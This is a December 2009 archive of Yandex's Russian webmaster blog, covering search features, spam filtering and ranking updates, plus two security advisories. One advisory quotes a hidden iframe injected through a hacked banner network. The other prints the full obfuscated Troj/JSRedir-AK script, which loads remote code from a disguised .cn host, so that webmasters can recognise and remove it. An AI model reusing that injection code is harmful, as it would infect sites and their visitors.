Блог Яндекса для вебмастеров

декабрь 2009
Данные о вашей организации в Яндекс.Вебмастере
1 декабря 2009, 19:05

Как показывают наши наблюдения, пользователи часто ищут организации в интернете, чтобы узнать их координаты в реальном мире. Поэтому, помимо адреса интернет-сайта компании, Яндекс старается показывать пользователям ее физический адрес и телефон. Сегодня в Яндекс.Вебмастере появилась форма, которая позволяет добавлять и редактировать данные об организации, связанной с сайтом: адреса, телефоны, область деятельности. Адреса и телефоны размещаются в результатах поиска рядом с описанием сайта:

А дополнительные параметры упрощают поиск вашей организации в Яндекс.Картах и Яндекс.Адресах:

К сайту можно привязывать произвольное число адресов, например, филиалов или точек продаж. В результатах поиска пользователь увидит адрес, соответствующий его местоположению или запросу. Сейчас инструмент работает в режиме бета-тестирования. Редактирование данных открыто для сайтов со значением ТИЦ выше 10. Об открытии этой возможности для всех мы сообщим отдельным постом.

Команды Яндекс.Вебмастера и Яндекс.Адресов

26 комментариев
содержимое сайта,Я.Вебмастер,локальность
Безопасная копия опасных сайтов
4 декабря 2009, 11:12
Представьте, что вы ищете какую-то очень нужную информацию. Вы ввели запрос в поиске Яндекса и получили страницу с результатами. Пробежав по ним взглядом, обнаруживаете, что один из сайтов, видимо, содержит именно то, что вам сейчас так необходимо. Но этот сайт имеет пометку, что он может угрожать безопасности вашего компьютера! В большинстве случаев сайты взламываются и инфицируются злоумышленниками, становясь опасными без ведома их владельцев. Но их страницы все так же содержат интересную и полезную для пользователей информацию. Можно, конечно, не обращая внимание на предупреждение, перейти по ссылке в надежде, что ничего страшного не произойдет. Как показывают собранные нами данные, очень немного пользователей чувствуют себя достаточно уверенно, чтобы зайти на сайт, помеченный в результатах поиска как опасный. Большинство же не решается подвергнуть компьютер риску заражения, рискнув еще и данными, которые могут быть украдены или изменены в результате срабатывания вредоносного кода. Что же им делать? Как посмотреть информацию на странице, не подвергая компьютер риску заражения? Теперь это можно сделать, используя новую функцию поиска Яндекса.

Теперь результаты поиска, помеченные как опасные, имеют ссылку на "безопасную копию". С ее помощью можно посмотреть оригинальный текст страницы, сохраненный Яндексом, но без элементов оформления и сценариев, которые могут вызывать вредоносный код. Ссылки внутри этой страницы на этот же или другие опасные сайты ведут на промежуточную страницу, с которой можно будет перейти на оригинальную страницу или на ее "безопасную копию". В "безопасной копии", так же как и в аналогичной ей "сохраненной копии" для неопасных сайтов, подсвечиваются ключевые слова, по которым осуществлялся поиск. Надеемся, что эта функция поможет нашим пользователям находить ответы без риска заражения компьютера. Группа пролетарского гнева компании Яндекс
21 комментарий
безопасность
Заголовок не указан
8 декабря 2009, 18:45
В Клубе Яндекс.Поиска у вас есть возможность открывать темы, интересные именно вам. Команда поиска с удовольствием примет участие в обсуждении многих вопросов, связанных с сервисом. Добро пожаловать!
Нет комментариев
Яндекс.Кругосветка
9 декабря 2009, 17:48

UPD Фотомарафон закончен. Спасибо всем за участие!

---

9 декабря 2009 года. Поиск Яндекса отправляется в кругосветное путешествие.

Путешествовать лучше в хорошей компании, поэтому мы хотим пригласить с собой всех вас. Что нужно для этого сделать? Находясь в каком-нибудь городе, нужно сфотографировать результаты выдачи Яндекса на фоне местных достопримечательностей.

Важно! В качестве запроса должно быть введено название города, в котором вы находитесь. Место должно быть узнаваемо. Т.е. фотография на фоне леса не годится, потому что это может быть, как парк в Новосибирске, так и сад в подмосковье. Города не должны повторяться.

Свои фотографии размещайте в галерее Клуба. И не забывайте ставить метку "Кругосветка".

Мы начинаем старт из Москвы. За качество снимка просим прощения, погода сделала свое дело.


Для азартных: каждому первооткрывателю новой страны — сувенир. Наш московский снимок мы считать не будем, так что у вас есть шанс «открыть Россию».

Поехали!

11 комментариев
Рекомендации по созданию сайтов
11 декабря 2009, 12:39

В 2009 году в Рунете появился миллион новых сайтов. Мы рады, что Интернет становится все более популярным. Для того, чтобы помочь начинающим веб-мастерам рассказать всем пользователям про свой замечательный сайт, мы опубликовали "Рекомендации по созданию сайтов". В этом документе (PDF) рассказывается, как построить свой сайт так, чтобы Яндекс включил его в поисковую базу и индексировал содержимое наиболее эффективно. Довольно часто неопытные веб-мастера допускают ошибки, мешающие поисковому роботу индексировать сайт. Следование нашим рекомендациям позволит избежать таких ошибок. Руководство будет полезно также заказчикам услуг по созданию сайта как перечень шагов, которые следует сделать, открывая своё представительство в Интернете.

Мы будем рады получить ваши замечания и предложения по поводу опубликованных рекомендаций.

Друзья Платона

46 комментариев
создание сайта
Про рекламные баннеры и безопасность сайта
16 декабря 2009, 20:02

В очередной раз хочется обратить внимание на проблему безопасности, связанную с размещением на сайтах рекламных материалов. Баннерные сети являются лакомым куском для вирусописателей, так как, внедрив вредоносный код в такую систему, можно автоматически распространить его на множество сайтов. Недавно такое произошло с довольно широко распространенной в Рунете баннерной системой.

При обращении к определенному URL, которое происходит на странице с рекламой, посылается запрос к одному из зеркал баннерной системы, где и располагаются сами рекламные материалы. Одно из зеркал системы было взломано, в результатае чего на нем был размещен вредоносный код.

В итоге всё превращается в определенный http-запрос, в результате которого вызывается

<iframe src="http://www.li******.cn/?id=#" width=1 height=1 frameborder=0></iframe>

Недавно из-за этого довольно много крупных сайтов представляли угрозу для посетителей и были помечены в результатах поиска Яндекса как потенциально опасные.

Подобные атаки, пожалуй, относятся к классу самых неприятных для антивирусных систем. Дело в том, что в зависимости от того, к какому рекламному серверу произойдет запрос, зависит, будет ли страница содержать вредоносный код или нет. Страница начинает "мигать": вредоносный код то есть, то нет. По нашим сведениям на текущий момент неполадки в работе баннерной системы устранены.

В заключение, хотим еще раз напомнить всем веб-мастерам, что следует взять за правило чрезвычайно внимательно относиться ко всем внешним данным, так или иначе использующимся на вашем сайте. И, к сожалению, баннеры не являются исключением из этого правила.


Группа пролетарского гнева компании Яндекс

1 комментарий
пролетарский гнев,безопасность,вирусы
Поиск оригиналов страниц стал лучше
17 декабря 2009, 13:41

Настоящий. Я это первый открыл вместе с Петром Ивановичем.


Добчинский

Перед поисковыми системами давно стоит проблема определения первоисточника контента в интернете. Иногда издательство выкладывает свои тексты в сеть позже, чем это делают пользователи. Бывает, что у автора контента вообще нет сайта в интернете. Всё чаще встречаются случаи автоматизированного копирования текстов с целью их размещения на спам-сайтах, созданных исключительно для манипулирования алгоритмами поисковых систем, о чём мы можем судить по жалобам в нашу службу поддержки.

Определение первоисточника текста, размещённого в сети, это сложная задача, которая ещё не решена в общем виде. Однако нам удалось построить алгоритм, который во многих случаях по косвенным признакам определяет, какая из группы страниц с одинаковым текстом является оригиналом. Этот алгоритм уже работает в российской формуле ранжирования, а через некоторое время он будет включён и для всех остальных стран.

Алгоритм ещё не обладает стопроцентными полнотой и точностью, но и мы работаем над его улучшением. Будем рады примерам некорректного ранжирования оригиналов и копий, что позволит нам быстрее повысить качество разработанного алгоритма.


Александр Шубин и команда поиска

41 комментарий
АГС-30
18 декабря 2009, 13:30
В интернете стало появляться все больше сайтов, предназначенных исключительно для манипулирования алгоритмами поисковых систем. Такие сайты не содержат полезной информации, не представляют интереса для пользователей и могут ухудшить качество поиска Яндекса. Во второй половине 2009 года количество исключаемых из индекса некачественных сайтов стало расти, и мы решили официально объявить о существовании алгоритма АГС-17, предназначенного для их фильтрации в результатах поиска. Мы получили большое количество положительных отзывов о работе алгоритма АГС-17. Но многие пользователи справедливо жалуются на то, что в результатах поиска Яндекса все еще остаются некачественные сайты. Поэтому мы постарались увеличить полноту АГС-17. Новый алгоритм, основанный примерно на ста факторах, стал значительно умнее, быстрее и полнее старого, при этом его точность продолжает оставаться очень высокой. Новый алгоритм получил название АГС-30. Группа пролетарского гнева компании Яндекс
502 комментария
пролетарский гнев
Поиск Яндекса в каждом городе
22 декабря 2009, 18:30

В середине ноября была запущена новая поисковая программа - "Снежинск". Как мы уже писали ранее, в "Снежинске" были впервые применены матричные математические модели, которые открыли совершенно новые возможности в поиске, в частности, позволили нам учитывать при ранжировании тысячи параметров для одного документа. С сегодняшнего дня на поиске Яндекса работает новая версия поисковой поисковой программы "Снежинск". В ней еще шире используются возможности нашего нового алгоритма MatrixNet. В обновленной версии, которая в честь родного города одного из разработчиков команды поиска получила неофициальное название "Конаково", локальное ранжирование теперь работает не только для 19 крупнейших регионов, как это было в программе "Арзамас", но также и для 1250 городов по всей России. Ден Расковалов и команда поиска

106 комментариев
MatrixNet,Снежинск,поисковая программа,локальность,Конаково
Вредоносный /*GNU GPL*/
24 декабря 2009, 18:55

В течение нескольких дней мы наблюдаем резкий рост числа сайтов, зараженных новым вирусом. Вредоносный код добавляется в файлы *.js на заражаемом сайте или просто в конец страницы. Злоумышленники пытаются замаскировать вредоносный код от веб-мастера при помощи использования комментария /*GNU GPL*/. Этот тип заражения сайтов классифицирован нашим антивирусным партнером компанией Sophos как Troj/JSRedir-AK.

Вредоносный код выглядит, например, так:

/*GNU GPL*/ try{window.onload = function(){var F1s4h5mjnzo = document.createElement('s(c&@^)r&^#i)(@p^&t^))'.replace(/#|@|&|\^|\!|\)|\(|\$/ig, ''));F1s4h5mjnzo.setAttribute('type', 'text/javascript');F1s4h5mjnzo.setAttribute('src', 'h@$!t#!!t!)$&p#:#&/@@/))#f(o(r&!$b!&e##^s!-$^!c#$&o&m).^(#m@@y#b@e@#s&&t@!y^)!#o(u((($x$!i#(.@&)@c&n@^@.(#^&s(#@i)(@@t^e(#&m&e^#$t!@e$^#r$-#c@&#o#^m^^(.@x!x^)x!x!@@x))!x(x$$@x$&x!))#l(@@x$.)&$r@($^u)!@):@^$&)8@)@0&8#$0)&/&c!l$a(&&r$i@&@n!$^.()(c(##o^#(m&$$)$/@#^c!(l)#!a)!(r$i&$)n(().$$c&^##@o(!&^m^^/^d@#@e$(@!^v#@i))&^)a(#!n)!t)@)a$r!t$(.($&c!^&o!#m)&@&/))(g)&^o^@)o)(#g&(#^l()!e!^!.)&@c)&&!o)()$!m@^/!!e@!x(@&a&@@m&i$n^@e&#(^&r)^.(c&(&o^&m(/#@)'.replace(/#|\!|\(|\$|&|\)|\^|@/ig, ''));F1s4h5mjnzo.setAttribute('defer', 'defer');F1s4h5mjnzo.setAttribute('id', 'J#(i)^#v$@@o(^@8(x!&w(^&r!&#^a$$^@e^3(^@$z#)i!)s#&#'.replace(/\(|@|\^|&|\)|\$|\!|#/ig, ''));document.body.appendChild(F1s4h5mjnzo);}} catch(e) {}

На текущий момент Яндексу известно примерно о двух тысячах сайтов, зараженных вирусом типа Troj/JSRedir-AK. Если вы заметили подобный код на вашем сайте, удалите его. Для того, чтобы своевременно получать уведомления о размещении на страницах вашего сайта вредоносного кода, советуем зарегистрировать сайт в Яндекс.Вебмастере.

UPD: Уже больше 2200.

UPD2: Уже больше 3000 (14:00 25.12.2009).


Группа пролетарского гнева компании Яндекс


P.S. Сайт ООН содержит вредоносный код другого типа :)

19 комментариев
безопасность,вирусы